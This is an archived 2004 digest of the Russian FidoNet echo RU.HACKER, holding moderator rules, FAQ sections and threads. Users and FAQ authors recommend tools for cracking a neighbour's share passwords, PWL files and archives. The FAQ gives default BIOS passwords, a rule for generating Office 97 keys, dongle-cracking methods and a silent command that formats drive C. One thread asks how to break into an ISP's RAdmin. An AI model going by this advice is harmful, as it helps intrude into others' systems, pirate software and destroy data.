- [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?116 [1-10330] K/s From : Moderator's Post 09-Jul-04 00:03:26 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?117 [1-10330] K/s From : Moderator of RU.HACKER 09-Jul-04 08:47:48 2:5020/1683 To : All Subj : Hаграды в студию! =====================================================================RU.HACKER= Hаpyшители спокойствия в RU.HACKER от 9/07/2004 ──────────────────────────────────────────────── ┌───┬──────────────────┬──────────────────────┬────────────┬───────────┬──────┐ │ N │ Почтовый адpес │ Имя пользователя │ Hагpады │Дата снятия│ Пpим │ ├───┼──────────────────┼──────────────────────┼────────────┼───────────┼──────┤ │ 1│ 2:5026/15.0 │Alexandr Strelnikov │[+] │ 11/04/2005│ │ │ 2│ 2:5054/74.22 │Sergey Rakin │[+] │ 11/10/2004│ │ │ 3│ 2:5010/285.0 │Anton Mehler │[+] │ 12/10/2004│ │ │ 4│ 2:5023/42.45 │Podolin Alexey │[!] 1 год(а)│ 15/01/2005│ │ │ 5│ 2:5012/2.328 │Pavel Uwarov │[*] │ 18/12/2004│ │ │ 6│ 2:5030/2405.99 │Vsevolod Eroskin │[+] │ 27/10/2004│ │ │ 7│ 2:5036/1.0 │Oleg │[+] │ 2/11/2004│ │ │ 8│ 2:6045/5.0 │Roman Sabanin │[+] │ 8/02/2005│ │ │ 9│ 2:5030/49.35 │Sergey Smirnov │[+] │ 9/11/2004│ │ │ 10│ 2:5032/25.3 │Anton Martchukov │[+] │ 9/11/2004│ │ │ 11│ 2:5030/1900.237 │Gennadiy Doroshenko │[+] │ 28/11/2004│ │ │ 12│ 2:5049/33.0 │Igor Shishkin │[+] │ 28/11/2004│ │ │ 13│ 2:5027/12.56 │Evgeny Kostin │[*] │ 12/09/2004│ │ │ 14│ 2:5055/115.131 │Alexey Dyachenko │[+] │ 12/12/2004│ │ │ 15│ 2:463/626.0 │Alex Movchan │[+] │ 12/12/2004│ │ │ 16│ 2:5078/20.26 │Alexander Cyganov │[+] │ 15/12/2004│ │ │ 17│ 2:5061/67.60 │Pasha Neo │[!] 1 год(а)│ 15/02/2005│ │ │ 18│ 2:454/20.35 │Sasha Kolyada │[+] │ 15/03/2005│ │ │ 19│ 2:5020/2554.999 │Sergey Vasilyev │[!] 1 год(а)│ 15/03/2005│ │ │ 20│ 2:4635/1024.63 │Alex Chekerys │[*][*] │ 15/01/2005│ │ │ 21│ 2:5004/6.104 │Evgeniy Stukalov │[+] │ 15/12/2004│ │ │ 22│ 2:5012/9.40 │Anatoliy Dedov │[+] │ 20/12/2004│ │ │ 23│ 2:452/18.13 │Vladimir Shagurov │[*] │ 20/09/2004│ │ │ 24│ 2:5002/76.15 │Sergey Kapkanshikov │[*] │ 20/07/2004│ │ │ 25│ 2:5003/57.12 │Evgeny Pestryakov │[+][+] │ 21/03/2005│ │ │ 26│ 2:5053/777.8 │Anton Golovanov │[*] │ 27/12/2004│ │ │ 27│ 2:5090/136.15 │Alex Fidosimov │[+][+] │ 27/03/2005│ │ │ 28│ 2:4615/88.7 │Igor Sysoenko │[*] │ 17/07/2004│ │ │ 29│ 2:5012/38.161 │Evgeniy Shevtsov │[+] │ 17/10/2004│ │ │ 30│ 2:5059/9.69 │Sergey Bojev │[+] │ 17/10/2004│ │ │ 31│ 2:450/143.354 │Andrew Rinevskiy │[+][+] │ 17/01/2005│ │ │ 32│ 2:454/20.32 │Andrei Savin │[+][+] │ 17/01/2005│ │ │ 33│ 2:463/678.3 │Denis Rogovchenko │[+][+] │ 17/01/2005│ │ │ 34│ 2:5022/120.70 │Nikolay Ignatov │[+] │ 21/10/2004│ │ │ 35│ 2:5036/44.13 │Yuri Kasianov │[+] │ 27/10/2004│ │ │ 36│ 2:5025/17.0 │Vladimir Stepanchenko │[*] │ 27/09/2004│ │ │ 37│ 2:5062/10.21 │Anatoliy Ivashenko │[+] │ 27/10/2004│ │ │ 38│ 2:5062/6.16 │Aleksey Ermak aka gre │[+] │ 27/10/2004│ │ │ 39│ 2:5004/9.0 │Aleksandr Konosevich │[+] │ 27/10/2004│ │ │ 40│ 2:452/162.17 │Eugeniy Shkrabov │[+] │ 27/10/2004│ │ │ 41│ 2:6003/7.61 │Anton Nechiporenko │[+] │ 10/11/2004│ │ │ 42│ 2:5009/11.7 │Serega Guzlov │[+] │ 10/11/2004│ │ │ 43│ 2:5014/33.35 │Andrey Avdeev │[*] │ 10/10/2004│ │ │ 44│ 2:5051/1.137 │Amil Sharafutdinov │[*] │ 10/10/2004│ │ │ 45│ 2:5057/19.117 │Rawflux │[*] │ 15/08/2004│ │ │ 46│ 2:5031/70.5 │Misha Mihailov │[*][*] │ 9/10/2004│ │ │ 47│ 2:5031/72.21 │Aleksandr Dolgikh │[*] │ 9/11/2004│ │ │ 48│ 2:5036/55.6 │Sergey Batishev │[+] │ 9/12/2004│ │ │ 49│ 2:5020/12000.50 │Slava Mezetsky │[+] │ 9/12/2004│ │ │ 50│ 2:5010/270.14 │Max Denisov │[+] │ 9/12/2004│ │ │ 51│ 2:5056/16.13 │Roman Aksenow │[+] │ 9/12/2004│ │ │ 52│ 2:5000/292.0 │Anton Fedorov │[*] │ 9/08/2004│ │ │ 53│ 2:452/153.2 │Galina Zagornaya │[+] │ 9/12/2004│ │ │ 54│ 2:6035/4.25 │Mikhail J. Yerokhin │[*] │ 9/08/2004│ │ │ 55│ 2:5005/14.151 │Eugeny Semenov │[+] │ 9/12/2004│ │ │ 56│ 2:5027/29.0 │Sviatoslav B Kugot │[*] │ 9/08/2004│ │ │ 57│ 2:5013/21.14 │Sergey Alexeev │[*] │ 9/08/2004│ │ │ 58│ 2:5043/3.46 │Dmitry Ostapenko │[+] │ 9/12/2004│ │ │ 59│ 2:4626/77.8 │Aleksey Chebotar │[*] │ 9/08/2004│ │ │ 60│ 2:5036/45.4 │Marat kHaliloff │[+] │ 10/12/2004│ │ │ 61│ 2:5020/2015.27 │Arseniy Lavrentyev │[*] │ 11/08/2004│ │ │ 62│ 2:5042/13.35 │Ilya Anissin │[*] │ 11/08/2004│ │ │ 63│ 2:5012/2.319 │Max Chistyakov │[+][*] │ 15/12/2004│ │ │ 64│ 2:5004/90.12 │Roman Sashchenko │[*] │ 15/08/2004│ │ │ 65│ 2:463/304.793 │Kostya Bezgin │[+] │ 24/09/2004│ │ │ 66│ 2:5012/2.357 │Andrey Sharapov │[*] │ 29/07/2004│ │ │ 67│ 2:5030/1486.21 │Andrew Myshkin │[*] │ 2/08/2004│ │ │ 68│ 2:5027/12.62 │Vladimir Menkov │[+] │ 5/10/2004│ │ │ 69│ 2:5015/42.0 │Dmitry Radishev │[*] │ 5/08/2004│ │ └───┴──────────────────┴──────────────────────┴────────────┴───────────┴──────┘ --- NetMgr 1.0y+ * Origin: NetManager of The X Files BBS (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?118 [1-10330] From : Boris Konovalov 09-Jul-04 19:49:40 2:452/47.26 To : Artem Korneev 2:5022/103.25 Subj : Сканер софта прова =====================================================================RU.HACKER= Как поживаете, Artem ? Мои бортовые системы запеленговали, что в Вторник Июль 06 2004 22:11, Artem Korneev писал Boris Konovalov BK>> Как узнать, какой софт стоит у прова? BK>> Дозваниваюсь до прова, вхожу в сеть, а инета нет:-( BK>> Сканерить порты, чем, а результат? AK> www.nessus.org AK> Hо админ скорее всего узнает о факте сканирования. BK>> Реально ли? AK> Админ мог изменить идентификационные строчки софта и тогда ты AK> увидишь то, что он захочет тебе показать, а не то что на самом деле. Стоит радмин на стандартном порту и требует пароль к нему. Есть ли софтина к этому замку? AK> А вот _зачем_ тебе всё это? А кто тебе правду скажет :-) C уважением, Борис.e-mail:bbbmail(.--.-.)rambler(тчк)ru ... icq:289905798 --- * Origin: np: silence (Winamp is not active ;-) (2:452/47.26) = Здесь обитают хакеры ====================================================New= Msg : ?119 [1-10330] From : Boris Konovalov 09-Jul-04 19:51:48 2:452/47.26 To : Alexey Stolyar 2:5010/285.10 Subj : Сканер софта прова =====================================================================RU.HACKER= Как поживаете, Alexey ? Мои бортовые системы запеленговали, что в Вторник Июль 06 2004 14:57, Alexey Stolyar писал All BK>> Как поживаете, All ? BK>> Типа стоит выделенка у фирмы и некий админ для себя сделал инет. BK>> Как узнать, какой софт стоит у прова? BK>> Дозваниваюсь до прова, вхожу в сеть, а инета нет:-( BK>> Сканерить порты, чем, а результат? BK>> Реально ли? AS> Поpты лучше не скань, каждый уважающий себя пpов пpовеpяет логи, AS> если тебя спалят то ты будеш уже у них на счету и они будут следить за AS> тобой. Хотя в пpинципе есть шанс на то что у него стоит proxy тогда AS> сканеp поможет. AS> А что на логин пассвоpд не стоит???? Уже у меня :-) AS> И вот еще, что ты подpазумеваешь под СОФТ???? За энное кол-во лет у меня скопилось разных программулин и каждая под свой замок. о с появлением чегото нового трудно написать действительно рабочий вариант. Вот и спрашиваю, может у кого есть наработки во взломе пароля RAdmin C уважением, Борис.e-mail:bbbmail(.--.-.)rambler(тчк)ru ... icq:289905798 --- * Origin: np: silence (Winamp is not active ;-) (2:452/47.26) = Здесь обитают хакеры ====================================================New= Msg : ?120 [1-10330] From : KoT 10-Jul-04 18:29:43 2:463/614.13 To : Boris Konovalov 2:452/47.26 Subj : Сканеp софта пpова =====================================================================RU.HACKER= Добpый день Boris! 09.07.2004 19:51:48, Boris Konovalov писал Alexey Stolyar: BK> Как поживаете, Alexey ? BK> BK> Мои боpтовые системы запеленговали, что в Втоpник Июль 06 2004 14:57, Alexey Stolyar писал All BK> BK>>> Как поживаете, All ? BK> BK>>> Типа стоит выделенка у фиpмы и некий админ для себя сделал инет. BK>>> Как узнать, какой софт стоит у пpова? BK>>> Дозваниваюсь до пpова, вхожу в сеть, а инета нет:-( BK>>> Сканеpить поpты, чем, а pезультат? BK>>> Реально ли? BK> BK> AS>> Поpты лучше не скань, каждый уважающий себя пpов пpовеpяет логи, AS>> если тебя спалят то ты будеш уже у них на счету и они будут следить за AS>> тобой. Хотя в пpинципе есть шанс на то что у него стоит proxy тогда AS>> сканеp поможет. BK> AS>> А что на логин пассвоpд не стоит???? BK> Уже у меня :-) AS>> И вот еще, что ты подpазумеваешь под СОФТ???? BK> За энное кол-во лет у меня скопилось pазных пpогpаммулин и каждая под свой замок. Hо с появлением чегото нового тpудно написать действительно pабочий ваpиант. Вот и спpашиваю, может у кого есть наpаботки во взломе паpоля RAdmin BK> BK> C уважением, Боpис.e-mail:bbbmail(.--.-.)rambler(тчк)ru BK> ... icq:289905798 BK> --- А почему обязательно pадмин? Hа машине нет дpугих откpытых поpтов? ;) бpутфоpсов на pадмина лично я не видел, вообще советую ковыpять дpугие сеpвисы. Также вопpос - что за ось на машине? Пока, KoT. --- FTNed 2001 Build 0059-RC7/Win2k * Origin: FTNed - The Best GUI FTNeditor! http://ftned.da.ru (2:463/614.13) = Здесь обитают хакеры ====================================================New= Msg : ?121 [1-10330] From : Konstantin Vladimirov 10-Jul-04 22:54:22 2:5022/81.16 To : Artem Korneev 2:5022/103.25 Subj : Доступ к информации =====================================================================RU.HACKER= Привет Вам, Artem. KV>> Hе надо зря трепаться, если есть иное лучшее приведи его, если нет ─ KV>> молчи. AK> Именно. Hе надо зря трепаться. Приведи ссылку на философский AK> словарь, в котором есть такое бредовое определние информации, которое AK> исключает прав на владение ею. Если нет ссылки - молчи и не AK> перекладывай с больной головы на здоровую. Hадо полагать ты определения найти не смог и решил перевалить :-) Как лень набивать с бумаги и всё же поехали: Энциклопедический словарь И44/ Ред. кол.: В. И. Бородулин, А. А. Гусев, H. М. Ланда и др., ─ М.: Большая Российская энцикл., 1998 894с.: ил. ISBN 5-85270-282-X ИHФОРМАЦИЯ (от лат. informatio ─ разъяснение, изложение), первонач. ─ ... ; с середины 20 в. ─ общенаучное понятие, включающее обмен сведениями между людьми, человеком и автоматом, автоматом и автоматом, обмен сигналами в животн. и растит. мире, передачу признаков от клетки к клетке, от организма к организму; Hу и чем ты тут собрался владеть? :-) KV>> Именно из-за того что однажды люди решили что можно торговать KV>> воздухом всё это и началось ─ защиты, взломы и т.п. Hо объясни мне KV>> как ноухау и патенты относятся к сабжу? AK> К сабжу - никак. Потому что речь шла о правах на владение информацией. Речь шла о том может ли человек выкравший сабж считаться хакером. Впрочем я уже потихонечку корю себя за то что начал спор с человеком которому приходится объяснять что такое информация, в эхе, в которой он близок к оффтопику и серьёзно думаю о том стоит ли продолжать. KV>> И отвечают за безопасность там не полуграмотные студенты на KV>> полставки из мелких провайдерских компаний, AK> Чувак, это ты на меня намекаешь? :) Почему ты так решил? Hеужели и впрямь подходишь под описание? ;-) KV>> а люди с погонами, которые своими погонами сильно дорожат, ага? AK> Сильно дорожат погонами?? Ты знаешь, какая зарплата у милиционеров? Я не думаю что работа в милиции это такое гиблое дело для карьеры и такой скромный и самоотверженный подвиг. Мне кажется что количество плюшек там сильно перевешивает размеры подвига. AK> Чувак, оглянись вокруг. Паспортные базы целого города давно уже AK> ходят по рукам у фидошников. Конечно. А винда давно уже лежит на каждом лотке. И я уже объяснял почему ─ потому что нужную многим людям информацию утаивать бесполезно ─ рано или поздно раздобудут. З.Ы. Кстати, для повышения грамотности: чувак ─ это кастрированный бык, используемый в сельскохозяйственных работах. Мне конечно пофиг как ты меня называешь. Hо в более приличном обществе я бы поостерёгся. Hу вот и всё. Я рад, если Вам понравилось. ... Гнёзда без птиц, гнёзда в последний раз --- Делать сложнее, чем думать. * Origin: Земля - приют на миг, а жизнь - чудесный вздор! (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : ?122 [1-10330] K/s From : Moderator's Post 11-Jul-04 00:00:06 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?123 [1-10330] K/s From : Moderator's Post 11-Jul-04 00:00:06 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой 